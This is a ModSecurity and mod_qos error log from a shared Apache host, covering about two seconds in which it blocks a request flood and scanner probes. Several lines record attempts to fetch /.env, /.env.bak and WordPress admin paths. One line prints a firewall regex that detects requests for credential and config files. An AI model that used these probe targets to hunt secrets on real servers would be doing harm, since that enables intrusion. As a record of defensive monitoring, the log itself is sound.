[Tue May 26 20:00:16.404119 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bqAAAAPg"]
[Tue May 26 20:00:16.407024 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bpAAAAMU"]
[Tue May 26 20:00:16.428019 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1blgAAAN0"]
[Tue May 26 20:00:16.439045 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bkAAAAO8"]
[Tue May 26 20:00:16.445755 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1brAAAAJY"]
[Tue May 26 20:00:16.530270 2026] [qos:error] [pid 106517:tid 106753] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWueIZZc2DoU1lPnP1cJQAAAOs
[Tue May 26 20:00:16.549547 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_mQAAAHs
[Tue May 26 20:00:16.551748 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cKQAAAKo
[Tue May 26 20:00:16.553505 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWueIZZc2DoU1lPnP1cKgAAAKs
[Tue May 26 20:00:16.559543 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_mgAAADw
[Tue May 26 20:00:16.566497 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_mwAAAFI
[Tue May 26 20:00:16.586072 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cLAAAAQM
[Tue May 26 20:00:16.591583 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cLQAAANY
[Tue May 26 20:00:16.601703 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_nAAAAE4
[Tue May 26 20:00:16.667924 2026] [security2:error] [pid 106517:tid 106764] [client 103.125.146.82:60235] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/system.php"] [unique_id "ahWueIZZc2DoU1lPnP1cMQAAAPY"]
[Tue May 26 20:00:16.684029 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cMwAAAKg
[Tue May 26 20:00:16.691905 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_owAAAAw
[Tue May 26 20:00:16.701089 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_pAAAAAE
[Tue May 26 20:00:16.701486 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_pQAAAHo
[Tue May 26 20:00:16.705453 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cNAAAAM4
[Tue May 26 20:00:16.713117 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_pgAAAF4
[Tue May 26 20:00:16.714238 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_pwAAAB4
[Tue May 26 20:00:16.739171 2026] [qos:error] [pid 106517:tid 106745] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cOAAAAOM
[Tue May 26 20:00:16.739452 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1cOQAAAPI
[Tue May 26 20:00:16.755493 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_rAAAAFw
[Tue May 26 20:00:16.819132 2026] [security2:error] [pid 106517:tid 106683] [client 152.232.68.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cNwAAAKU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 20:00:17.173198 2026] [security2:error] [pid 106517:tid 106764] [client 103.163.220.46:58779] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/maint/"] [unique_id "ahWueYZZc2DoU1lPnP1cSAAAAPY"]
[Tue May 26 20:00:17.206183 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWueYZZc2DoU1lPnP1cSQAA3DA"]
[Tue May 26 20:00:17.280972 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bpwAAAJk"]
[Tue May 26 20:00:17.285593 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bswAAAJ0"]
[Tue May 26 20:00:17.292532 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1brwAAAMY"]
[Tue May 26 20:00:17.294848 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1blwAAANM"]
[Tue May 26 20:00:17.296225 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1buQAAAMg"]
[Tue May 26 20:00:17.296502 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1blQAAAJU"]
[Tue May 26 20:00:17.302519 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_JwAAAEA"]
[Tue May 26 20:00:17.306184 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bjAAAAOQ"]
[Tue May 26 20:00:17.306986 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bngAAAPA"]
[Tue May 26 20:00:17.307801 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bqQAAALo"]
[Tue May 26 20:00:17.312882 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bugAAALs"]
[Tue May 26 20:00:17.323590 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_bgAAAFs"]
[Tue May 26 20:00:17.325323 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_MAAAAGA"]
[Tue May 26 20:00:17.337527 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_KQAAACs"]
[Tue May 26 20:00:17.347207 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_OAAAAGk"]
[Tue May 26 20:00:17.348400 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1b_gAAAOA"]
[Tue May 26 20:00:17.354151 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1b_wAAAOo"]
[Tue May 26 20:00:17.355134 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_MgAAADs"]
[Tue May 26 20:00:17.355654 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bqgAAAK4"]
[Tue May 26 20:00:17.356429 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1btAAAANQ"]
[Tue May 26 20:00:17.366934 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cAgAAAMk"]
[Tue May 26 20:00:17.375440 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_MQAAAEo"]
[Tue May 26 20:00:17.380925 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bjQAAAME"]
[Tue May 26 20:00:17.382914 2026] [security2:error] [pid 93576:tid 93685] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env"] [unique_id "ahWueWDRMqfxdEDkosz_twAAJmc"]
[Tue May 26 20:00:17.392602 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cAAAAAL0"]
[Tue May 26 20:00:17.399848 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cCwAAANg"]
[Tue May 26 20:00:17.406776 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cAwAAAKk"]
[Tue May 26 20:00:17.407487 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cBwAAAJE"]
[Tue May 26 20:00:17.407570 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cBQAAAMI"]
[Tue May 26 20:00:17.419930 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cAQAAAKQ"]
[Tue May 26 20:00:17.422860 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bsAAAAOw"]
[Tue May 26 20:00:17.424233 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_cgAAAGI"]
[Tue May 26 20:00:17.427485 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_fQAAADg"]
[Tue May 26 20:00:17.438815 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cDgAAAI4"]
[Tue May 26 20:00:17.582770 2026] [security2:error] [pid 106517:tid 106605] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.bak"] [unique_id "ahWueYZZc2DoU1lPnP1cWAAA5lU"]
[Tue May 26 20:00:17.679655 2026] [security2:error] [pid 93576:tid 93744] [client 103.163.220.11:34099] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/.well-known/"] [unique_id "ahWueWDRMqfxdEDkosz_wQAAACA"]
[Tue May 26 20:00:17.782201 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWueWDRMqfxdEDkosz_xAAAJ3c"]
[Tue May 26 20:00:18.103357 2026] [security2:error] [pid 93576:tid 93724] [client 46.8.110.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkosz_0gAAAAw"], referer: https://www.anujtradingco.com/
[Tue May 26 20:00:18.113275 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkosz_-gAAACo
[Tue May 26 20:00:18.114079 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkosz__AAAAEk
[Tue May 26 20:00:18.126245 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWueoZZc2DoU1lPnP1cwwAAAJY
[Tue May 26 20:00:18.127346 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuemDRMqfxdEDkoswAAAAAACE
[Tue May 26 20:00:18.128682 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWueoZZc2DoU1lPnP1cxAAAAIo
[Tue May 26 20:00:18.128701 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWueoZZc2DoU1lPnP1cxgAAAN8
[Tue May 26 20:00:18.128734 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuemDRMqfxdEDkoswAAQAAADU
[Tue May 26 20:00:18.130428 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuemDRMqfxdEDkoswAAwAAAC4
[Tue May 26 20:00:18.130540 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuemDRMqfxdEDkoswABAAAAHU
[Tue May 26 20:00:18.133339 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuemDRMqfxdEDkoswABwAAAFE
[Tue May 26 20:00:18.173178 2026] [security2:error] [pid 106517:tid 106674] [client 103.163.220.21:21361] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/blue/"] [unique_id "ahWueoZZc2DoU1lPnP1czAAAAJ0"]
[Tue May 26 20:00:18.236657 2026] [security2:error] [pid 106517:tid 106666] [client 209.163.119.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cywAAAJU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1234657&moderation-hash=45e3fe6b7ae77da2fe6b0a5adb07324d
[Tue May 26 20:00:18.274061 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cFAAAALU"]
[Tue May 26 20:00:18.278269 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswADAAAAGQ
[Tue May 26 20:00:18.280451 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswADQAAAGs
